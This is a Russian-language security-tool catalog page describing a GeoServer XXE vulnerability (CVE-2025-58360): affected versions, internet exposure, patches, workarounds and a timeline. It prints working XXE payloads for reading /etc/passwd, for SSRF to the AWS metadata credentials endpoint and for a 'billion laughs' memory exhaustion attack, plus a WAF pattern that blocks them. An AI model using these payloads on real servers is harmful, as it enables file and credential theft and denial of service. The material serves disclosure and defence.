Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Blackash-CVE-2025-58360 — CVE-2025-58360 | Kitploit
Инструменты/GitHubGitHub/carlzhang123/blackash-cve-2025-58360
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииВеб-безопасностьТестирование на Проникновение
GitHubcarlzhang123/blackash-cve-2025-58360

Blackash-CVE-2025-58360

CVE-2025-58360

Репозиторий
8 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🔓 🛰️ 'CVE-2025-58360' WMS-эндпоинт GeoServer уязвим к XXE-атаке 🌟

GeoServer

🏷️ Основная информация

  • CVE ID: CVE-2025-58360
  • Опубликовано: 📅 25 ноября 2025
  • Последнее изменение: 📅 25 ноября 2025 (всё ещё актуально на 26 ноября)
  • Тип уязвимости: XML External Entity (XXE) – CWE-611
  • Затронутое ПО: GeoServer (геопространственный сервер с открытым исходным кодом, написанный на Java)
  • Серьёзность: 🔥 Высокая – базовая оценка CVSS v3.1 7.5
    • Вектор: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L
  • Эксплуатация в дикой природе: 🟡 Пока не наблюдалась (26 ноября 2025) – но публичные PoC уже распространяются
  • Требуется аутентификация: ❌ Нет – полностью без аутентификации
  • Требуется взаимодействие с пользователем: ❌ Нет

🎨 Что делает эту ошибку особенной (и опасной)

Это классическая, но разрушительная XXE в эндпоинте GetMap службы Web Map Service (WMS).
Атакующие могут:

  • 📂 Читать любой файл, к которому имеет доступ процесс GeoServer (/etc/passwd, geoserver.xml, приватные ключи и т. д.)
  • 🌐 Выполнять Server-Side Request Forgery (SSRF) для сканирования внутренних сетей или обращения к metadata-эндпоинтам (например, AWS/GCP)
  • 💣 Вызывать отказ в обслуживании (Denial-of-Service) с помощью атак с расширением сущностей («billion laughs»)
  • 🔗 Потенциально комбинировать с другими ошибками для получения полного RCE (не напрямую, но возможно при некорректной конфигурации)

🛡️ Затронутые версии (подробная таблица)

🌍 Глобальная подверженность (в реальном времени на 26 ноября 2025)

→ Это десятки тысяч потенциально уязвимых серверов, которые прямо сейчас находятся в открытом интернете! 🌐

🧨 Полный технический разбор эксплуатации уязвимости

Эндпоинт: POST /geoserver/wms
Ключевой параметр: SLD_BODY (позволяет передавать необработанный XML-код стилей)
Уязвимый участок кода: парсер XML не отключает разрешение внешних сущностей → классическая XXE.

f77f64d7c92fd31b29d537f5205da524

Пример 1 – Раскрытие файлов (/etc/passwd)

root@kitploit:~
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<sld:StyledLayerDescriptor xmlns:sld="http://www.opengis.net/sld" version="1.0.0">
  <sld:UserLayer>
    <sld:LayerFeatureConstraints>
      <sld:FeatureTypeConstraint>&xxe;</sld:FeatureTypeConstraint>
    </sld:LayerFeatureConstraints>
  </sld:UserLayer>
</sld:StyledLayerDescriptor>

→ Ответ содержит содержимое /etc/passwd 🎉

Пример 2 – SSRF к внутренним метаданным (пример AWS)

root@kitploit:~
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">

→ Приводит к утечке временных учётных данных AWS при работе на EC2.

Пример 3 – DoS «billion laughs»

root@kitploit:~
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!-- repeat up to lol9 -->
]>
<lol>&lol9;</lol>

→ За секунды расходует гигабайты оперативной памяти 💥

🛠️ Официальные исправления и загрузки

ВерсияДата выпускаСсылка для загрузки
2.27.025 ноября 2025https://geoserver.org/release/stable/

Пользователи Docker:

root@kitploit:~
docker pull osgeo/geoserver:2.27.0

🔧 Обходные пути (если вы не можете сразу установить исправление)

  1. Блокируйте опасный XML с помощью правила WAF/mod_security:
    Отклоняйте запросы, содержащие <!ENTITY или SYSTEM "file://
  2. Отключите параметр SLD_BODY глобально (если он не нужен)
  3. Запустите GeoServer с файловой системой только для чтения + сбросьте capabilities
  4. Разместите за обратным прокси, который удаляет XML-тела запросов для неаутентифицированных пользователей

📢 Официальные ссылки и PoC

  • Запись NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-58360
  • Уведомление GeoServer: https://github.com/geoserver/geoserver/security/advisories/GHSA-fjf5-xgmq-5525
  • Тикет JIRA: https://osgeo-org.atlassian.net/browse/GEOS-11682
  • Публичный безопасный PoC (Python): https://gist.github.com/bolhasec/32fa035354d7cc9417aa297e2fe22b30
  • Шаблон Nuclei (автообнаружение): уже объединён в основную ветку

⏰ Хронология

ДатаСобытие
До ноября 2025Обнаружено автономно ИИ-сканером XBOW
25 ноября 2025Скоординированное раскрытие → выпущены исправления
25 ноября 2025CVE присвоен и опубликован
26 ноября 2025PoC становятся вирусными, сканирование подверженности резко возрастает

✨ Заключение

Это классическая XXE, поражающая широко развёрнутую геопространственную платформу с десятками тысяч экземпляров, доступных из интернета.
Исправления вышли в тот же день, что и раскрытие, — огромный респект команде GeoServer за скорость! 🏆
Но окно между выпуском исправления и массовой эксплуатацией стремительно сокращается.

Если вы используете GeoServer → обновитесь сегодня.
Не становитесь следующей новостью.

Оставайтесь в безопасности, оставайтесь на высоте! 🛡️✨

Скачать инструмент
КомпонентУязвимые версииИсправлено вСтатус
GeoServer Standalone2.26.0 – 2.26.1
≤ 2.25.5
2.26.3, 2.25.6, 2.27.0🔴 Уязвим
Docker (osgeo/geoserver)2.26.0 – 2.26.1
≤ 2.25.5
2.26.2+, 2.27.0🔴 Уязвим
Maven org.geoserver:gs-wms2.26.0 – 2.26.1
≤ 2.25.5
2.26.2+, 2.25.6🔴 Уязвим
Maven org.geoserver.web:gs-web-app2.26.0 – 2.26.1
≤ 2.25.5
2.26.2+, 2.25.6🔴 Уязвим
GeoServer 2.27.x и новее–Уже исправлено✅ Безопасно
ИсточникОткрытые экземплярыПримечания
ZoomEye~49,400поиск app:"GeoServer"
FOFA~24,000Результаты за последний год
Shodan~31,000Порт 8080 + совпадение по заголовку
GobySec~20,000Сканирование публичной сети
2.26.325 ноября 2025Исправление ветки сопровождения
2.25.625 ноября 2025Более старая поддерживаемая ветка